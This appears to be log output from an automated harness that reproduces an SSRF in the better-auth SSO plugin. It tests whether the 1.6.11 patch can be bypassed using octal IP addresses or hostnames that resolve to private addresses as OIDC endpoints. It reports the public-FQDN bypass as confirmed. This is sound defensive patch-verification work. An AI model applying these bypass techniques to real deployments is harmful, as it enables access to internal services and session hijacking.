[variant] === Better-Auth SSO Octal-IP SSRF Variant/Bypass === [variant] Workspace: /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/vuln_variant [variant] === Setting up vuln (better-auth@1.6.10, attacker_host=127.0.0.1, expect_bypass=true) === [variant] Installing better-auth@1.6.10 @better-auth/sso@1.6.10 vitest ... npm warn deprecated uuid@8.3.2: uuid@10 and below is no longer supported. For ESM codebases, update to uuid@latest. For CommonJS codebases, use uuid@11 (but be aware this version will likely be deprecated in 2028). added 93 packages, and audited 94 packages in 2s 31 packages are looking for funding run `npm fund` for details 4 vulnerabilities (1 moderate, 1 high, 2 critical) To address all issues, run: npm audit fix --force Run `npm audit` for details. [variant] Running vitest for vuln ... register response: 200 { "tokenEndpoint": "http://127.0.0.1:9876/token", "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", callback status: 302 location: /dashboard session: { attacker requests: [ "url": "/token", "url": "/userinfo", [variant] vuln: bypass/variant NOT reproduced (test failed) [variant] ERROR: Vulnerable baseline did not reproduce; environment is not suitable for variant testing [variant] === Better-Auth SSO Octal-IP SSRF Variant/Bypass === [variant] Workspace: /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/vuln_variant [variant] === Setting up vuln (better-auth@1.6.10, attacker_host=127.0.0.1, expect_bypass=true) === [variant] Running vitest for vuln ... register response: 200 { "tokenEndpoint": "http://127.0.0.1:9876/token", "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", sign-in response: 200 { callback status: 302 location: /dashboard attacker requests: [ "url": "/token", "url": "/userinfo", session: { [variant] vuln: bypass/variant reproduced [variant] === Setting up fixed (better-auth@1.6.11, attacker_host=0177.0.0.1, expect_bypass=true) === [variant] Installing better-auth@1.6.11 @better-auth/sso@1.6.11 vitest ... [variant] Running vitest for fixed ... register response: 400 { [variant] fixed: bypass/variant NOT reproduced (test failed) [variant] === Setting up latest (better-auth@latest, attacker_host=0177.0.0.1, expect_bypass=false) === [variant] Installing better-auth@latest @better-auth/sso@latest vitest ... [variant] Running vitest for latest ... register response: 400 { [variant] latest: patch unexpectedly allowed the variant [variant] ERROR: Latest release did not block the octal-IP variant [variant] Discovered container hostname for bypass: 974542b9802b [variant] === Better-Auth SSO public-FQDN/private-IP SSRF Variant/Bypass === [variant] Workspace: /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/vuln_variant [variant] === Setting up vuln (better-auth@1.6.10, attacker_host=127.0.0.1, expect_bypass=true) === [variant] Running vitest for vuln ... register response: 200 { "tokenEndpoint": "http://127.0.0.1:9876/token", "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", sign-in response: 200 { callback status: 302 location: /dashboard attacker requests: [ "url": "/token", "url": "/userinfo", session: { [variant] vuln: bypass/variant reproduced [variant] === Setting up fixed (better-auth@1.6.11, attacker_host=974542b9802b, expect_bypass=true) === [variant] Running vitest for fixed ... register response: 200 { "tokenEndpoint": "http://974542b9802b:9876/token", "userInfoEndpoint": "http://974542b9802b:9876/userinfo", sign-in response: 200 { callback status: 302 location: http://localhost:3000/api/auth/error?error=account not linked attacker requests: [ "url": "/token", "url": "/userinfo", [variant] fixed: bypass/variant NOT reproduced (test failed) [variant] === Setting up latest (better-auth@latest, attacker_host=974542b9802b, expect_bypass=false) === [variant] Running vitest for latest ... register response: 200 { "tokenEndpoint": "http://974542b9802b:9876/token", "userInfoEndpoint": "http://974542b9802b:9876/userinfo", sign-in response: 400 { [variant] latest: patch unexpectedly allowed the variant [variant] ERROR: Latest release did not block the public-FQDN/private-IP variant [variant] Discovered container hostname for bypass: 974542b9802b [variant] === Better-Auth SSO public-FQDN/private-IP SSRF Variant/Bypass === [variant] Workspace: /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/vuln_variant [variant] === Setting up vuln (better-auth@1.6.10, attacker_host=127.0.0.1, expect_bypass=true) === [variant] Running vitest for vuln ... register response: 200 { "tokenEndpoint": "http://127.0.0.1:9876/token", "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", sign-in response: 200 { callback status: 302 location: /dashboard attacker requests: [ "url": "/token", "url": "/userinfo", session: { [variant] vuln: bypass/variant reproduced [variant] === Setting up fixed (better-auth@1.6.11, attacker_host=974542b9802b, expect_bypass=true) === [variant] Running vitest for fixed ... register response: 200 { "tokenEndpoint": "http://974542b9802b:9876/token", "userInfoEndpoint": "http://974542b9802b:9876/userinfo", sign-in response: 200 { callback status: 302 location: http://localhost:3000/api/auth/error?error=account not linked attacker requests: [ "url": "/token", "url": "/userinfo", [variant] fixed: bypass/variant reproduced [variant] === Setting up latest (better-auth@latest, attacker_host=974542b9802b, expect_bypass=false) === [variant] Running vitest for latest ... register response: 200 { "tokenEndpoint": "http://974542b9802b:9876/token", "userInfoEndpoint": "http://974542b9802b:9876/userinfo", sign-in response: 400 { [variant] latest: patch correctly blocked the variant [variant] === Variant confirmed: 1.6.11 fix bypassed via public-FQDN/private-IP OIDC endpoints === [variant] Discovered container hostname for bypass: 974542b9802b [variant] === Better-Auth SSO public-FQDN/private-IP SSRF Variant/Bypass === [variant] Workspace: /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/vuln_variant [variant] === Setting up vuln (better-auth@1.6.10, attacker_host=127.0.0.1, expect_bypass=true) === [variant] Running vitest for vuln ... register response: 200 { "tokenEndpoint": "http://127.0.0.1:9876/token", "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", sign-in response: 200 { callback status: 302 location: /dashboard attacker requests: [ "url": "/token", "url": "/userinfo", session: { [variant] vuln: bypass/variant reproduced [variant] === Setting up fixed (better-auth@1.6.11, attacker_host=974542b9802b, expect_bypass=true) === [variant] Running vitest for fixed ... register response: 200 { "tokenEndpoint": "http://974542b9802b:9876/token", "userInfoEndpoint": "http://974542b9802b:9876/userinfo", sign-in response: 200 { callback status: 302 location: http://localhost:3000/api/auth/error?error=account not linked attacker requests: [ "url": "/token", "url": "/userinfo", [variant] fixed: bypass/variant reproduced [variant] === Setting up latest (better-auth@latest, attacker_host=974542b9802b, expect_bypass=false) === [variant] Running vitest for latest ... register response: 200 { "tokenEndpoint": "http://974542b9802b:9876/token", "userInfoEndpoint": "http://974542b9802b:9876/userinfo", sign-in response: 400 { [variant] latest: patch correctly blocked the variant [variant] === Variant confirmed: 1.6.11 fix bypassed via public-FQDN/private-IP OIDC endpoints === [variant] Discovered container hostname for bypass: 974542b9802b [variant] === Better-Auth SSO public-FQDN/private-IP SSRF Variant/Bypass === [variant] Workspace: /data/pruva/project-cache/a937b1f3-9b59-4a11-81fc-750572359892/vuln_variant [variant] === Setting up vuln (better-auth@1.6.10, attacker_host=127.0.0.1, expect_bypass=true) === [variant] Running vitest for vuln ... register response: 200 { "tokenEndpoint": "http://127.0.0.1:9876/token", "userInfoEndpoint": "http://127.0.0.1:9876/userinfo", sign-in response: 200 { callback status: 302 location: /dashboard attacker requests: [ "url": "/token", "url": "/userinfo", session: { [variant] vuln: bypass/variant reproduced [variant] === Setting up fixed (better-auth@1.6.11, attacker_host=974542b9802b, expect_bypass=true) === [variant] Running vitest for fixed ... register response: 200 { "tokenEndpoint": "http://974542b9802b:9876/token", "userInfoEndpoint": "http://974542b9802b:9876/userinfo", sign-in response: 200 { callback status: 302 location: http://localhost:3000/api/auth/error?error=account not linked attacker requests: [ "url": "/token", "url": "/userinfo", [variant] fixed: bypass/variant reproduced [variant] === Setting up latest (better-auth@latest, attacker_host=974542b9802b, expect_bypass=false) === [variant] Running vitest for latest ... register response: 200 { "tokenEndpoint": "http://974542b9802b:9876/token", "userInfoEndpoint": "http://974542b9802b:9876/userinfo", sign-in response: 400 { [variant] latest: patch correctly blocked the variant [variant] === Variant confirmed: 1.6.11 fix bypassed via public-FQDN/private-IP OIDC endpoints ===